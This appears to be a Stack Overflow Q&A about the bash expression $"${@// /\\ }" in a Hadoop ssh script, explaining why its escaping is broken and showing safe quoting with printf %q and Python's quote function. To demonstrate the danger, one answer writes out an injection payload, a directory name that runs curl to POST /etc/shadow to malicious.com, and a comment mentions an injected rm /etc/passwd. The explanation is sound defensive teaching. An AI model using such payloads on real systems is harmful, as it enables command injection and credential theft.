# What does $"${@// /\\ }" mean in bash?

Tags: bash, shell, hadoop

When I read a Hadoop deploy script, I found the following code:

```
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
```

The `"${@// /\\ }"` input is a simple shell command (parameter expansion).  Why add a `$` before this command? What does this `$""` mean?

Comment: `$"..."` is used for locale specific translation, but I'm not sure I understand how that would apply here.

Comment: I suspect someone is making a broken attempt to do what `ssh ... "$@"` would do.

Comment: Here's a breakdown: `${@// /\\ }` was an attempt to escape all spaces, but obviously this is not going to work on `$@`. `$"..."` is probably an attempt to escape `$@` or an attempt at indirection but obviously won't work either.

Comment: BTW, the `HADOOP_SSH_OPTS` variable's usage here is buggy too -- if you tried to pass `HADOOP_SSH_OPTS='-o ProxyCommand="ssh bouncehost nc -w 120 %h %p"'`, for instance, you'd find that it wouldn't work for the reasons given in [BashFAQ #50](http://mywiki.wooledge.org/BashFAQ/050).

Comment: @chepner, ...or, rather, what it **should** do, since what it **does** do is rather awful (flattening arguments with whitespace before sending them to the remote system as a single string).

Answer (score 4):

This code is simply buggy: It *intends* to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses `$""` syntax (performing a translation table lookup) without any comprehensible reason to do so.

### The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)

#### Part 1: Describing The Problem

Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.

Thus:

```
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
```

...looks exactly the same to the remote system as:

```
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
```

...thus removing the effect of the quotes. If you want the effect of the first command, what you *actually need* is something like this:

```
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
```

...where the command, *with its quotes*, are passed as a single argument to SSH.

#### Part 2: The Attempted Fix

The syntax `"${var//string/replacement}"` evaluates to the contents of `$var`, but with every instance of `string` replaced with `replacement`.

The syntax `"$@"` expands to the full list of arguments given to the current script.

`"${@//string/replacement}"` expands to the full list of arguments, but with each instance of `string` in each argument replaced with `replacement`.

Thus, `"${@// /\\ }"` expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.

It thus modifies this:

```
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
```

To this:

```
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
```

...which SSH munges into this:

```
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
```

Looks great, right? Except it's not.

#### Aside: What's the leading $ in $"${@/...//...}" for?

It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.

#### Why That Code Is Dangerously Buggy

There's a lot more you need to escape than spaces to make something safe for shell evaluation!

Let's say that you were running the following:

```
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
  ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
```

Looks pretty safe, right? But let's say that `someuser` is sloppy about their file permissions (or malicious), and someone does this:

```
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
```

Oh, no! Now, if you run that script with root permissions, you'll get your `/etc/shadow` sent to `malicious.com`, for them to try to crack your passwords at their leisure -- and *the code given in your question won't help*, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about `$()` or backticks or other characters that can control the shell.

---

### The Right Thing (Option 1: Consuming Stdin)

A safe and correct way to escape an argument list to be transported over ssh follows:

```
#!/bin/bash

# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$@"

# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
```

There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote `/bin/sh` doesn't support bash extensions such as `$''`.

---

### The Right Thing (Option 2: Using Python)

Unlike both bash and ksh's `printf %q`, the Python standard library's `pipes.quote()` (moved in 3.x to `shlex.quote()`) is guaranteed to generate POSIX-compliant output. We can use it as such:

```
posix_quote() {
  python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}

cmd_str=$(posix_quote "$@")
ssh "$slave" "$cmd_str"
```

Answer (score 0):

Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.

The `${@// /\\ }` will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.

Anyway, probably an example is in order. Create a tst.sh with above line and make executable.

```
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
```

try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that `server` with user id `uid`:

```
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
```

Because of the quoting of whitespace taking place, you'll now have a `dir with spaces` directory in /tmp on the `server` owned by `uid`.

Check using `ssh uid@server ls /tmp`

And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.

Comment: Are you implying that this code is correct? (It's very much not).

Comment: ...try running `./tst.sh $'mkdir "/tmp/$(echo\thello\tworld)"'` -- a correct escaping would create an entry in `/tmp` with `$()` as literal text, a buggy one will run the command substitution and create `/tmp/hello world` -- but that command substitution could just has easily included a `rm /etc/passwd`.

Comment: As for `$""`, it's a syntax that has the purpose of telling the shell to look for the string in the local language's translation table. It exists explicitly, and strictly, for text **intended to be read by humans**, to translate it into the language used by the human behind the keyboard.

Comment: ...and `"${@// /\\ }"` is simply not a strong enough escaping to make arbitrary commands safe to pass through `ssh` -- hence my example which used literal tabs rather than spaces in `$()` to execute arbitrary shell injection.

Comment: Nope, not saying it's correct, just helping to show what it does.

Comment: Hmm. I'm not really sure that describing `$""` as necessary for entering non-English characters is accurate -- `$"Hello"` might become `नमस्कार` if you have a gettext translation table for Nepalese (f'rinstance), but one doesn't need it to just assign `नमस्कार` to a string -- that could just be done with `s='नमस्कार'`.